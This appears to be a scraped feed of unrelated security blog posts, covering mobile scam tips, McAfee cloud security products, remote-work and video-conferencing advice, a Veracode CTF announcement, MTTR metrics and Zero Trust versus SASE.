Be careful about which apps you download

Only download apps from reputable app stores and check the app’s reviews before purchasing.

Look into a spam blocker

Many phone carriers offer a service or app that helps identify and filter out spam calls. This can help greatly minimize those phishing calls.

Practice safe surfing & shopping
When surfing or shopping on your mobile device, go directly to the legitimate website or reputable app instead of clicking on links in messages. You can also avoid risky websites by having the Safe Web (safe browsing tool) turned on in McAfee Mobile Security.

Keep your devices secure and protected

Keep your device protected with mobile security software. Products like McAfee Mobile Security perform regular scans to help protect you from malware and ensure that your apps are safe.


The post The Latest Mobile Scams & How To Stay Safe appeared first on McAfee Blogs.

Custom Applications with CASB

More and more organizations are making the decision to move their legacy, in-house applications to the cloud mainly due to the cost savings. One of the major concerns about moving applications to the cloud is how to secure an application that was originally designed to be on-premise.

When these applications were behind on-premise network security there was not a concern about who would be able to access them and what they were doing in the application. Moving to the cloud now introduces this dynamic and with it concerns around how to control who accesses the applications once they are in the cloud.

This move to the cloud now also opens the door to accessing applications from anywhere in the world and potentially any device. Being able to have visibility into where a user is logging in from geographically as well as what activities a user takes beyond an initial login and the context upon which that access occurs will help keep the data secure.

These same applications may have relied on a local directory to store attachments or documents. Moving to the cloud would likely mean storing those same attachments or documents in a cloud-based directory like Amazon Web Services (AWS) Simple Storage Service (S3) or Microsoft Azure Blob Storage.

When on-premise access to the application or information within the application would typically be limited to a corporate-wide incident. If access settings in the cloud are misconfigured, then the exposure is much larger.

Having the ability to easily and quickly add these capabilities to applications being moved to the cloud can be addressed by leveraging an API framework into the model. Incorporating an API framework would provide the following capabilities:

  1. Prevent unauthorized sensitive data from being stored in cloud collaboration, file-sharing, or storage devices
  2. Capture a complete audit trail of all user activity for forensic investigations
  3. Detect malware, compromised accounts, privileged access misuse and insider threats
  4. Successful/failed login attempts
  5. Who is accessing the application, device type, IP address, role of the user and geographic location
  6. How much data is being accessed, created, updated, deleted, downloaded, shared, or uploaded

MVC for Custom Applications will enable organizations to enforce CASB policies without the need for developers to spend a lot of valuable time writing code. This will allow legacy applications to have the MVC CASB enforce security policies enforced on it, whether the application is in a private data center or in the cloud.

To learn more about McAfee’s cloud solutions, check out McAfee MVISION Cloud Portfolio.

The post Custom Applications with CASB appeared first on McAfee Blogs.

Home Network Design – Part 2

Ethan Robish // Why Segment Your Network? Here’s a quick recap from Part 1. A typical home network is flat. This means that all devices are connected to the same router and are on the same subnet. Each device can communicate with every other with no restrictions at the network level. This network’s first line […]

The post Home Network Design – Part 2 appeared first on Black Hills Information Security.

NIST and OSTP Launch Effort to Improve Search Engines for COVID-19 Research

GAITHERSBURG, Md. — Today, the U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) and the White House Office of Science and Technology Policy (OSTP) launched a joint effort to support the development of search engines for research that will help in the fight against COVID-19. The project was developed in response to the March 16 White House Call to Action to the Tech Community on New Machine Readable COVID-19 Dataset. “Our nation’s scientific enterprise is mobilized to defeat the invisible enemy that is COVID-19,” said Secretary of Commerce Wilbur Ross. “Our

Secure Together: video conferencing, credential stuffing and eye strain

As we enter the fourth week of the lockdown, you’ve hopefully begun to find a routine in your new work arrangement.

Perhaps you’re able to get out of bed and shower before logging on instead of lying in bed until 8:55 am and crawling to your desk. Maybe you feel less guilty about having a mid-morning video chat with a colleague in lieu of your normal coffee break.

And fingers crossed you’re accustomed by now to saving up your one daily trip outdoors so that you have something to look forward to.

Despite the absurdity of all this, the one thing that makes it almost bearable is knowing that we’re all in it together. That’s why each week we’re sharing our experiences, advice and guidance on how to manage through the pandemic.

Let’s take a look at what this week has to offer.

Cyber attacks

The video conferencing platform Zoom has been heavily criticised in recent weeks, amid a series of allegations related to its inadequate cyber security and privacy measures.

It’s perhaps therefore not a surprise to learn that the login credentials of more than 500,000 Zoom accounts have been found for sale on the dark web.

Researchers believe the information was compromised elsewhere, but the attacks used credential-stuffing attacks to confirm that people had reused their passwords on Zoom.

In other words, if you created a Zoom account using the same username and password that you’ve used elsewhere, attackers may have been able to access your account.

It’s worth emphasising, then, that for all of Zoom’s security faults, the blame for this incident lies with users rather than the platform.

To put it bluntly: there is nothing Zoom could have done to prevent this. It’s up to each of us to make sure we exercise good password practices whatever service we use, and part of that involves using a unique password for each account that we create.

Phishing scams

We recently discussed the threat of coronavirus-related phishing scams targeting the elderly, who are perhaps most at risk of falling victim due to their susceptibility to both criminal schemes and COVID-19.

The criminals’ ploys include creating bogus websites supposedly selling facemasks, and text messages imitating the government that claim that the recipient is being fined for breaking social distancing guidelines.

With scams like these netting cyber criminals more than £1.6 million, Trading Standards agencies across the UK have stepped in, urging people to act cautiously.

Louise Boyall, a team leader for Leicestershire Trading Standards, said: “We are calling on the elderly and the vulnerable, especially, to be on their guard.

“Unscrupulous criminals will always try to exploit a crisis, unfortunately, and exploit those members of society most at risk.”

Meanwhile, Trading Standards officers in Carmarthenshire have been carrying out welfare calls to vulnerable residents, and Cambridgeshire and Peterborough Trading Standards Service is asking people to report any online products that claim to protect people from coronavirus that haven’t been provided by a reputable supplier.

Expert advice

Video conferencing has become one of the main ways that employees communicate with each other during the coronavirus pandemic, but it’s not just software vulnerabilities that you need to be concerned about. You also need to be careful about mistakes you make when using the software.

In addition to poor password practices, as we discussed above, employees might forget that they have their camera or microphone on, which could result in them sharing information with unauthorised personnel or otherwise finding themselves in embarrassing and unprofessional situations.

Likewise, employees should be careful about what’s visible on their screen. This is most likely to be a problem if you have a whiteboard in your office on which work or personal details (such as your Wi-Fi password) are written.

Some video conferencing platforms include features that allow you to blur or mask your background, which is helpful if you want to avoid these risks.

Meanwhile, it’s always worth considering what information you might be sharing via these services. Just because you are working from home, it doesn’t mean you should neglect office protocols regarding protecting sensitive data.

IT Governance employee tips for working from home

Even though the lockdown is starting to feel a little more normal, new problems are never far away. For example, when we caught up with our Head of Marketing James Warren, we learned that he’d noticed a problem arising from his new work set-up.

“Anyone that wears contact lenses will be very aware that they sometime make your eyes feel tired and dry, and that could lead to eye strain and headaches,” he said.

“I’ve noticed in the last week that I’m spending more time looking at my screen that usual, due to [having so many] online meetings […] and therefore have been suffering more than usual.”

He said one of the ways he’s addressed this problem is to take more frequent breaks – something you should be mindful of even if you don’t wear contact lenses. Getting away from the screen, and preferably going outside, helps prevent eye strain, as you aren’t just focusing on the foreground.

James also found that switching to glasses as early into the evening as possible helped prevent further eye strain.

Free brochure: Managing remote workers’ mental health

Our mental wellbeing has been almost as big of a concern during the lockdown as our physical health. Shut inside either by ourselves or cooped up with family or housemates (either of which is conceivably worse than the other) is bound to take its toll, and could manifest itself in the workplace through fractious relationships with colleagues or in slips in productivity.

Our free guide – Managing Remote Workers: With a mind to mental health – helps organisations anticipate and address this problems.

It advises managers on the steps they can take to help an isolated workforce stay connected and how to spot signs that something might not be right with an employee. Perhaps there’s something about a way they’re acting in a video call or the tone of their emails or IMs that suggests they’re struggling.

With this guide, you can navigate these problems before they turn into something serious. After all, the coronavirus pandemic is tough enough without internal quarrels to worry about.

Coronavirus: your biggest challenge yet

Between a stumbling economy, coronavirus-related scams and concerns over employees’ mental health, organisations have a lot on their plates at the moment.

When you factor in the additional risks – such as an increased reliance on technology to share information and a weakened cyber security set-up with employees working from home – the pandemic poses serious problems that can’t be ignored.

That’s why we’ve put together a series of packaged solutions to help you tackle whatever comes your way. We have tools and services to help you address business continuity management, for example, as well as remote working best practices and network vulnerabilities.

Meanwhile, we’re offering 25% off our certified online training courses throughout May – which are available in several remote learning options.

Find out more

The post Secure Together: video conferencing, credential stuffing and eye strain appeared first on IT Governance UK Blog.

How to Keep Your Video Conferencing Meetings Secure

Guest Post by By Tom Kellermann (Head Cybersecurity Strategist, VMware Carbon Black)

The sudden and dramatic shift to a mobile workforce has thrust video conferencing into the global spotlight and evolved video conferencing vendors from enterprise communication tools to critical infrastructure.

During any major (and rapid) technology adoption, cyberattackers habitually follow the masses in hopes of launching an attack that could lead to a pay day or give them a competitive advantage. This has not been lost on global organisations’ security and IT teams, who are quickly working to make sure their employees’ privacy and data remains secure.

Here are some high-level tips to help keep video conferencing secure.

Update the Application
Video conferencing providers are regularly deploying software updates to ensure that security holes are mitigated.  Take advantage of their diligence and update the app prior to using it every time.

Lock meetings down and set a strong password
Make sure that only invited attendees can join a meeting. Using full sentences with special characters included, rather than just words or numbers, can be helpful. Make sure you are not sharing the password widely, especially in public places and never on social media. Waiting room features are critical for privacy as the meeting host can serve as a final triage to make sure only invited participants are attending. Within the meeting, the host can restrict sharing privileges, leading to smoother meetings and ensuring that uninvited guests are not nefariously sharing materials. 

Discussing sensitive information
If sensitive material must be discussed, ensure that the meeting name does not suggest it is a top-secret meeting, which would make it a more attractive target for potential eavesdroppers.  Using code words to depict business topics is recommended during the cyber crime wave we are experiencing.

Restrict the sharing of sensitive files to approved file-share technologies, not as part of the meeting itself
Using an employee sharing site that only employees have access to (and has multi-factor authentication in place) is a great way to make sure sensitive files touch the right eyes only.  This should be mandated as this is a huge Achilles heel.

Use a VPN to protect network traffic while using the platform 
With so many employees working remotely, using a virtual private network (VPN) can help better secure internet connections and keep private information private via encryption. Public WiFi can be a gamble as it only takes one malicious actor to cause damage.  Do not use public WiFi, especially in airports or train stations.  Cyber criminals lurk in those locations.

If you can, utilise two networks on your home WiFi router, one for business and the other for personal use.
Make sure that your work computer is only connected to a unique network in your home. All other personal devices – including your family’s – should not be using the same network. The networks and routers in your home should be updated regularly and, again, should use a complex password. Additionally, you should be the only system administrator on your network and all devices that connect to it.

All of us have a role to play in mitigating the cyber crime wave.  Please remember these best practices the next time you connect. Stay safe online

Also related - How Safe are Video Messaging Apps such as Zoom?

Five Tips from McAfee’s Remote Workers

Whether you’re working from for the first time or a remote working veteran, you may be looking for some tips to set yourself up for success as many of us practice social distancing to protect the health of our families and communities.

We turned to McAfee’s remote team members who regularly navigate working from home for advice. Incorporate the valuable practical tips or reminders, like virtual coffee breaks or lunches, below into your new routine.

  1. Get Comfortable with Technology
    “As I help my kids start online learning through Zoom, I’m reminded our customers use a variety of platforms. When you can’t meet face-to-face, get comfortable with using different platforms to stay connected with your clients. ​​​​​​​Remember, like us, technology is constantly improving so stay relevant and keep your skills fresh, practice and don’t be afraid to ask questions or pause for a quick Google search.”
    — Paige, Organizational Change Manager

  2. Separate Work and Life
    “Try to have a separate work space that detaches you from home life and distractions. Keep regular hours. Not necessarily 9-5, but routine times for work. Schedule break times to get away so you don’t get carried away with work and leverage tools like Microsoft Teams to collaborate, call, message and meet with others.”
    — Mark, Professional Services Consultant

  3. Pack Your Patience & Be Healthy
    “Life is happening right now for us, our customers, our partners and our families. This morning, it took four call backs to get through a customer call as his children were arguing in the background. We can work through this time together with patience and understanding. Schedule breaks and focus on your own health with home workouts to combat cabin fever and maintain your sanity. No equipment? No worries. A towel can replace a yoga mat and two cans from your pantry can replace weights.”
    — Brenda, North America Consumer Sales

  4. Invest in the Right Tools
    “What are some tools you’ve been eyeing that might help improve your workflow or productivity? I recently bought the Bose SoundLink Revolve to use as a speakerphone on my desk at home. It helps me block out distractions and focus. Works great!”
    — Suzette, Software Sales Account Rep

  5. Follow Instant Messaging Etiquette
    “When you can’t gauge how busy someone is sitting next to you, connect with care in response to someone’s current status availability. If someone’s status is “Busy,” consider waiting to reduce interruptions, a brief IM to see if they can talk or an email instead. And remember, brevity is key. It provides your recipient with the ability to respond if available or ignore immediately and respond later when available.”
    — Andy, Enterprise Architect

Seeking a fulfilling new career opportunity that will provide you with balance and flexibility? Search McAfee’s current openings.

The post Five Tips from McAfee’s Remote Workers appeared first on McAfee Blogs.

McAfee and Atlassian Collaborate to Deliver Cloud Security Capabilities

Today cloud adoption is considered mainstream, with 83% of enterprise workloads expected to in the cloud by 2020 . As more organizations move their workloads to the cloud and to remote work from home environments, security must also evolve to meet the challenges of this new normal. According to a recent McAfee report, the average enterprise organizations utilizes 1,400 different cloud services fueling the need for solutions that are designed to secure the cloud. Further, industry analyst firm Gartner warns that “through 2025, 99% percent of cloud security failures will be the customer’s fault.”1 This has caused enterprises to look for ways to enforce additional security controls on their cloud solutions beyond what a cloud service provider (SaaS or IaaS) offers natively.

Atlassian is a SaaS software powerhouse that builds products for content management, software development & project management, widely adopted by organizations globally. McAfee MVISION Cloud is a leading Cloud Access Security Broker (CASB) that provides comprehensive visibility and control for SaaS, PaaS, and IaaS, across Content and DevOps environments. The collaboration between Atlassian and McAfee combine their joint strengths to deliver an optimized cloud security solution for customers.

Key Customer Challenges

As enterprises adopt cloud applications, they may see the following challenges related to cloud security:

  • Users may unintentionally upload sensitive data on to a cloud service for e.g. health insurance claim numbers, credit card numbers, AWS keys, etc. in. Jira Software, Confluence or other cloud applications
  • In the modern enterprise, traditional network parameters are dissolving. Most users now use devices that sit outside the enterprise firewall to access enterprise cloud applications such as Jira Software, Confluence, Bitbucket and Bamboo.
  • Exiting employee may go rogue or leave their credentials easily accessible. Risk of insider threats, compromised user accounts or privileged access on SaaS applications need to be addressed
  • Drifts in configurations of SaaS applications like Jira Software Cloud can cause unintentional exposure of sensitive data
  • Infrastructure code misconfiguration or “drift,” from standard benchmarks that occur over time in a cloud environment can expose sensitive information and increase risk.

McAfee MVISION Cloud for Atlassian Solution

McAfee MVISION Cloud for Atlassian products help organizations securely accelerate their business in the following ways:

  • MVISION Cloud (MVC) prevents sensitive or regulated data from being uploaded or shared with unauthorized parties in real-time, while using Atlassian’s Jira Software or Confluence Cloud products. For example: detecting PII (Social Security Numbers), PCI (credit card numbers), HIPAA classified data (health insurance claim number) or other Confidential Data (Mergers & Acquisitions related documents)
  • MVISION Cloud limits download/sync to unmanaged devices and gain total control over user access to Atlassian applications by enforcing context-specific policies limiting specific end-user actions.
  • MVISION Cloud captures the complete audit trail of all user activity enriched with threat intelligence to facilitate post incident forensic investigations. MVC detects threats from compromised accounts, insider threats, privileged access misuse and malware infection.
  • Customers use a source code repository & CI/CD tools for building Cloud Native applications. McAfee MVISION Cloud integration with Atlassian’s Bitbucket Cloud and Bamboo products helps detect drifts in configuration from standard CIS benchmarks. It also ensures that data is protected on misconfigured resources or just simply within these applications

Atlassian-McAfee Collaboration Benefits

To summarize, a chain is only as strong as its weakest link. The collaboration between Atlassian and McAfee combines their joint strengths to deliver an optimized cloud security solution that is a win-win for the customer as well as the cloud provider.

Shared Right: Security is a shared responsibility between Customers and Cloud Providers

Atlassian’s cloud tools are mission critical to customer businesses and places where they may be storing sensitive information in Jira Software, Confluence and Bitbucket. One of the reasons that 99% of issues are expected to be attributed to the customer, is that while cloud providers (including Atlassian) have invested very heavily in security and have directly addressed core challenges that an on-prem solutions may cause (with updates, vulnerability monitoring, incident response, etc.), their customers may be much earlier on in their security journey. Here’s where McAfee MVISION Cloud steps in to secure the delta, by helping customers deliver on their share of the security responsibility.

For example, a large healthcare customer is using McAfee MVISION Cloud to detect any sensitive data violating compliance and regulatory policies within Jira Software or Confluence Cloud.

Shift Left: Securing DevOps by Enabling DevSecOps

As a maker of tools for development teams, Atlassian wants to make it easier for developers to build and operate secure products, while responding to security incidents more quickly and effectively. McAfee MVISION Cloud “Shift Left” can help Atlassian customers ensure that the infrastructure and the myriad of configurations options available, are deployed according the security and regulatory compliance best practices. “Shift Left” inline integration seamlessly incorporates these security checks without any extra steps required by the developers or DevOps teams.

To learn more about how McAfee-Atlassian products work together, please attend our joint webinar on May 20th, 2020

Additional Resources:

Blog: McAfee MVISION Cloud for Atlassian Access

Blog: Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes



1 Source: “Smarter With Gartner” Blog, Is the Cloud Secure?, October 10, 2019,  Contributor Kasey Panetta,

The post McAfee and Atlassian Collaborate to Deliver Cloud Security Capabilities appeared first on McAfee Blogs.

McAfee MVISION Cloud for Atlassian Access

Atlassian cloud products help small, medium, and big enterprises around the world to build and run their businesses effortlessly by enabling collaboration among team members both co-located and working remotely. Be it Jira for project planning and issue tracking, Confluence for document collaboration, Bitbucket for source code repository management, Opsgenie for incident management, or Jira Service Desk for customer support, all the products from Atlassian suite allow cross functional teams to achieve higher productivity in various stages of the business workflow.

However, the flexibility of being able to access cloud products from any device or location also means higher risk of potential security threats. Any enterprise using Software-as-a-Service tools is vulnerable to the following threats.

  • Compromised credentials: Stolen or compromised credentials of users or administrators through various means such as phishing can result in data breaches by letting the adversaries get access to sensitive data of the organization stored in the cloud
  • Privilege user threats: Abuse of privilege user roles or permissions can result in insider threats that pose a greater risk to organization’s data

McAfee MVISON Cloud’s integration with Atlassian Access provides the additional security layer for the organizations using Atlassian tools and allows these organizations to take advantage of the productivity gains from using the cloud native products of Atlassian without compromising on security.

By integrating with Atlassian Access’s organization audit log, McAfee MVISION Cloud creates a comprehensive audit trail of user and administrator activity to allow the security admins perform forensic investigations based on various attributes such as user, location, activity type etc., and automatically identifies threatful or anomalous user and administrator behavior by applying machine learning on the activity feed. As a comprehensive cloud security platform, McAfee can detect cross-cloud threats that involve usage across Atlassian products and other cloud services. As threats are resolved, McAfee automatically incorporates this data into its behavioural models to improve detection accuracy.

Enterprises can benefit from the following security controls provided out-of-the-box by McAfee MVISON Cloud: 

  • McAfee detects compromised account activity in Atlassian based on brute force login attempts, access from new and untrusted locations for a specific user, and user activity from multiple locations in a time period that implies impossible travel, even if the user activity occurs across multiple cloud services.
  • McAfee automatically constructs a behavior model with dynamic and continuously updated thresholds for each user and team to identify activity indicative of insider threat, whether the threat is accidental or malicious. Privileged User Analytics identifies risk from dormant administrator accounts, excessive permissions, and unnecessary escalation of privileges and user provisioning.

The post McAfee MVISION Cloud for Atlassian Access appeared first on McAfee Blogs.

Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes

Infrastructure-as-a-Service (IaaS) is used by organizations of all sizes as the new default IT environment to build and host internal and customer-facing applications. To leverage numerous capabilities offered by IaaS providers for faster adoption, many organizations overlook the cloud shared-responsibility model and assume that security is taken care of completely by the cloud provider. At the end of the day, the security of what cloud customers put in the cloud, most importantly sensitive data, is their responsibility. According to leading analyst Gartner,Through 2025, 99% of cloud security failures will be the customer’s fault 

Per McAfee CARR reportabout 99% of misconfigurations go unnoticed by companies using IaaS. On an average, companies were aware of about 37 misconfiguration incidents per month, but real-world data shows that companies actually experience closer to 3,500 such incidents – about ~100 times more! 

It is possible that the speed of IaaS adoption is putting a lot of security practitioners behind, and in the never ending catch-up game. And, as expected, the flexibility offered by IaaS providers helps to change the infrastructure rapidly based on ever-changing demands, leaving the door open through misconfigurations happens all the time. More so, as the changes are done through Infrastructure as Code (IaCin Continuous Integration/ Continuous Delivery (CI/CD) fashion. While MVISION Cloud’s IaaS config audit reports and helps to ensure that deployed infrastructure is compliant and pristine, as new resources are deployed through DevOps templates, similar compliance issues keep getting reported over and over. 

Integration with Atlassian Bitbucket pipes performs ‘inline’ evaluation of the DevOps templates such that any DevOps template push to the Bitbucket code repo which is configured to trigger a build, in turn automatically evaluates them to check for vulnerabilities present. And, any misconfiguration errors are reported right in the developer’s console highlighting all specific policies in question. 

This helps the DevOps personnel analyze and remediate misconfiguration issues at source such that any further deployment using those templates don’t create further and similar issues in the IaaS environments. Hence, the Security team enforces the process and sets the guidelines avoiding the issue of dealing with an impossible task of keeping up with the ever growing non-compliant issues. The ability to enforce these checks earlier in the DevOps cycle immensely helps so that they can delegate enforcement for any new resources that are deployed, and stop the deployment of any non-complaint DevOps templates. By adding security earlier into the DevOps process, security professionals can catch risky configurations before they become a threat in production.  

The integration setup is simple where the YAML file is configured to use the McAfee MVISION Cloud Docker image along with few environment variables. Setup completes once pipelines is enabled. The scans support AWS CloudFormation, Azure ARM and Terraform templates. All the issues are also reported as incidents in MVISION Cloud’s dashboard. 

It is imperative for enterprises to better align developers and security. The end goal is a state where developers aren’t seeing security as just a check box or something to throw over the fence to the security team during production, but as an essential part of their daily development process. As a maker of tools for development teams, Atlassian wants to make it easier for developers to build and operate secure products, while responding to security incidents more quickly and effectively. The partnership between Atlassian and McAfee combines the joint strengths to deliver an optimized security solution for customers.  Join us to learn more at the Atlassian 2020 Summit.

1 Source is: “Smarter With Gartner” Blog, Is the Cloud SecureOctober 10, 2019 Kasey Panetta 

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose 


The post Shift Left Inline – Integration with Atlassian Bitbucket CI/CD Pipes appeared first on McAfee Blogs.

Introducing Capture the Flag Puzzles!

Remember those boundless summer days playing ???Capture the Flag??? over the scent of freshly cut grass? No other care in the world aside from finding and seizing that victory flag with bragging rights for the rest of the day? ???Capture the Flag??? wasn???t just an intense physical exercise to release energy; it was a fun mental escape, too. That???s something many of us need now more than ever.

We know a lot about work-hard-play-hard here at Veracode. Every year, Veracoders intermingle practice and play in our ???Innovation Hackathons,??? encouraging each other to think outside of the box and flex our creative muscles. Veracode???s yearly Hackathon activities span the gamut of energizing challenges and perplexing puzzles - the latter of which we???re excited to share with all of you through

What is It???s ???Capture the Flag??? (CTF) for anyone looking to challenge their mind (and perhaps take a mental break from current events, too). is a series of puzzles ranging from simple to complex. Some require paper and a pencil while others involve advanced abilities and divergent thinking. Pick and choose which puzzles you want to tackle, then work in teams to solve them or fly solo and test your skills.

Signing up is easy and anyone can do it. Register here, confirm your account (note: we will not use your information for anything other than activities), and then dig into the challenges. You can also check the scoreboard to monitor your progress against others and see where you stand ??? there???s nothing wrong with a little friendly competition!

Ready, set, solve

Let???s get down to the nitty-gritty of how to solve puzzles on For each puzzle you open in the challenges section, you???ll need to solve the clues or work through the exercises to find a concealed password. That???s the ???flag??? we???re after. Once you???ve solved a puzzle and ???captured??? the hidden password, type it in as the solution on the puzzle???s page and instantly see if you???re right. If not, you???ll need to go back to the drawing board.

The puzzles are grouped into three basic levels:

Level 1: These are more common (think crossword puzzle) but might have another layer to them. If you get stuck, look for clues within clues.

Level 2: These are slightly trickier and might require some searching beyond your skillset, or information on specific types of puzzles and how to solve them.

Level 3: These are the most challenging puzzles that often require skills in programming or might push you to take basic skills to another level.ツ?

If you get stuck or need help, some of the puzzles offer guidance in the form of hints. You can also reach out to us on social media using #veracodepuzzles or post in our community to share tips, ask for clues, and celebrate victories.ツ?

Ultimately, we hope you have fun and can use these Hackathon puzzles to sharpen a skillset or spark creative inspiration just like we do.

Ready to get solving? Show us what you???ve got.

Using Median Time to Resolve Efficiently 

Customers that have embraced DevOps often ask me for the best metrics to measure their program. I always advocate focusing on policy compliance as the number one metric for understanding your risk, as this provides a succinct measurement of the security of your applications.

However, if you are looking to measure and motivate development teams, policy compliance doesn???t give you the granularity to introduce gamification or incentives. Policy compliance is very black and white; you either are compliant (good!) or you are not (bad!). So, when talking to customers about motivating teams in the spirit of continuous improvement, I like to bring up Mean Time to Resolve (MTTR).

I???ve also seen this as ???Mean Time to Repair,??? ???Mean Time to Recovery,??? or ???Mean Time to Respond.??? I personally like ???resolve??? as it indicates that the security finding has been closed, which is aligned with how we compute this metric.

You often see MTTR in association with DevOps and the tenant of making work visible and measurable ??? and thus unprovable. This is why I bring it up with our users; however long it takes you to resolve a security finding will help organizations make program improvements that move the needle on the overall metric of policy compliance.

How MTTR is calculated at Veracode

The standard definition for MTTR is along the lines of the following: corrective maintenance time / total number of corrective maintenance actions.

When it came time to implement MTTR in our new analytics feature, we initially interpreted this as finding first found date ??? finding closed date for each finding divided by total number of findings. Sounds good at face value, but when it comes to Veracode???s security findings, implementing this exact calculation gets a bit tricky.

Since customers are primarily using Static Analysis as part of their development pipelines we focus on static findings to ensure the calculation makes sense, though this is applicable to Dynamic Analysis and open-source findings as well.

For Static Analysis findings, each finding can be open and closed many times depending on the code that is scanned. If a developer scans a piece of code multiple times but with subtle changes, we can assert that findings are closed intentionally and fixed. If a developer scans code and forgets a module or only scans a small part of the code that they are working on, we don???t see the findings that were previously found and thus those are marked as closed as well since they are not present.

If the developer then scans the whole application again, those findings are reopened. This happens regularly through the development cycle. Measuring the activity of open and closed doesn???t seem relevant in this context. However, once you are focused on a release candidate, this sort of measurement takes on new importance.

Additionally, if you are looking at an application that is in production, this measurement is even more important, as this is where we are effectively seeing the time that an organization takes to respond to and resolve security findings.

Delivering a meaningful MTTR

How do we provide MTTR that is meaningful? In Veracode Analytics, we focus on the most recent time a finding was found, and the most recent time that the finding was closed. We always look at the policy context for calculating MTTR. While this can be calculated on a per-sandbox context basis, attempting to calculate MTTR across all sandboxes leads to very bizarre data due to flaw matching.

If a flaw is open in Sandbox 1 but closed in Sandbox 3 because it wasn???t present and mitigated in Sandbox 17, what is the current state of that flaw? Does the most recent scan, regardless of sandbox or policy, represent the ???current??? state, or does it just represent a scan that was performed? This is why limiting to the policy context is important, since there is a level of control for the scans performed at the policy level.

???Resolved??? means both fixed (also known as ???remediated??? or no longer present in the scan) as well as mitigated, where someone has documented a compensating control for the finding and that control has been approved. This means that if a finding has an associated approved mitigation, the most recent time it was found could also be the exact same time it was resolved since the mitigation will immediately close the finding.

The final nuance to MTTR is to compare the speed of addressing policy-impacting findings vs general security debt. Veracode's policy is regularly - and should be ツ?- used as a sieve to ensure clear communication with development teams on what is important and what needs to be fixed, as opposed to what is simply additional information. If the policy is used correctly, you should see that policy-impacting findings are resolved at a faster rate than all other findings. If this isn???t the case, then the policy isn???t being used by the dev time to prioritize work.

The ???average??? approach to MTTR

MTTR is by nature a calculation; despite its name, we are actually performing an average.

???Days to Resolve??? is a dimension on a finding. This data is only populated if the finding is in a closed state. A finding is a flaw-matching flaw that Veracode has seen over many scans???incidentally, this is why we separate out ???Scan Explore??? from ???Findings Explore??? in the Analytics feature, as Scans are a point in time while findings are over time.

When we look at MTTR, we are inherently looking at a group of findings and their ???Days to Resolve??? dimensions, then taking an average of the total time to resolve divided by the number of findings.

Measuring Time to Resolve for your organization

A customer recently asked me why he saw a different MTTR for his entire organization than when he found the average MTTR for his three business units.

For each application, you have N number of findings in a closed state with a Time to Resolve. When we look at the measure Mean Time to Resolve, we are actually providing the average Time to Resolve for the dimension selected. So, when you look at a single application and see ???Days to Resolve,??? you are actually seeing the average across N.


Average time to resolve = ツ?( ホ」 xiツ?) / n = (Sum of Time to resolve for each finding) / Number of findings

The sum is asking why (A= ( ホ」 xiツ?) / n1)+ (B = ( ホ」 xiツ?) / n2)+ (C= ( ホ」 xiツ?) / n3)+ ツ???? (Z =( ホ」 xiツ?) / nA) where n1, n2, and n3 are each business unit (BU), and nA is all three BU???s together.

When you look at this mathematically and think about the order of operations, you will realize that you always complete the ホ」 xiツ?before you divide by the number of findings. This means that each BU (A, B, and C) may have drastically different numbers than all of the BU???s together (Z) because you are taking the division step before you take the addition step???which is mathematically incorrect.

In short, you are providing equal weighting where there should not be equal weighting.

MTTR Example???

Here is an example:

BU A contains 2 closed flaws that took 1 day to close. The MTTR for BU A = (1+1)/2 = 1

BU B contains 200 closed flaws that took 20 days to close. The MTTR for BU B = (200x20)/20 =200

If we then add those and divide by two, we do not get the MTTR for all flaws across the two BUs. Instead, we get a number that is meaningless because of the significant weight that is given to the two flaws of BU A.ツ?If we want the MTTR for all flaws across the two BUs, then we must add all flaws in Time to Resolve together and then divide by total number of flaws.

Using MTTR the right way

Across our customer base, we see a wide variety in MTTR. A lot of this is tied to the type of application and its criticality to the organization. If you have an internal-facing legacy system, an average time to resolve for that application of 30 days may be great. If you have an external application that handles your PII, five days may be too long for your average time to resolve.

Metrics and KPIs provide information, but it is up to the AppSec leadership to use the information and make data-driven decisions???both in running the day-to-day operations of the AppSec program and in managing the understanding of risk for the organization as a whole.


Zero Trust, SASE-Digital Enablers or Adding Complexity to Cyber Ecosystems

Given the title of this article I suspect you are reading this because you have been in a recent situation where you have been asked the question “What is the difference between Zero Trust and SASE?”. I further suspect that the next question you were asked of course is “Which approach is right for my organization?”.  The reality is they are built upon a similar foundation of least privilege management and both matter in the bigger picture. The real question is how do you apply ZTA and SASE to your organization.

The answer is complex. Yes, this may seem like a classic consultant’s default position on just about any complicated question. In this case, it really does depend on several factors. First let’s look at the basic definitions of ZTA and SASE and their origins.

The term Zero Trust was first originated by the industry analyst Forrester a little over a decade ago. The initial concept focused on segmenting and securing the network across locations and hosting models and promoting the idea of the Zero Trust model — the need to challenge and eliminate the inherent trust assumptions in our security strategies that made us vulnerable to external and internal attacks.

Fast forward to the present, Zero Trust has evolved to a framework and or strategy as described by some industry experts. The current definition further extends the concept for secure network connectivity where the initial security posture has no implicit trust between different entities, regardless of whether they are inside or outside of the enterprise perimeter. Least-privilege access to networked capabilities is dynamically extended only after an assessment of the identity of the entity, the system and the context.

Secure Access Services Edge [“pronounced SASSY”] is a term defined by Gartner in 2019. SASE builds on the ZTA concept however credits digital business transformation and specifically introduces the concept that the future of network security will be in the cloud. The SASE model or framework promotes the concept which inverts network and security service design patterns, shifting the focal point to the identity of the user and/or device — not the data center. SASE suggests that Security and risk management leaders will need a converged cloud-delivered secure access service edge to address this shift.

The National Institute of Science and Technology (NIST) has also weighed in on its definition of Zero Trust with the release of NIST SP 800-207. NIST goes on to define ZTA is not a single network architecture but a set of guiding principles in network infrastructure design and operation that can be used to improve the security posture of any classification or sensitivity level.

Many organizations already have elements of a ZTA and or SASE in their enterprise infrastructure today. Organizations should seek to prioritize the identification of architecture gaps against its current state and incrementally implement zero trust principles, process changes, and technology solutions that protect its data assets and business functions towards a future desired state outcome with measurable success criteria well defined in advance.

Most enterprise infrastructures will operate in a hybrid Zero Trust-SASE/Legacy mode for the next several years while continuing to invest in ongoing IT modernization initiatives and improving organization business processes. Organizations need to implement effective information security and resiliency practices for zero trust and SASE to be effective. When complemented with existing cybersecurity policies and guidance, identity and access management, continuous monitoring, and good cybersecurity best practices, ZTA and SASE can reinforce an organization’s security posture using a managed risk approach and protect against common and advanced threats.

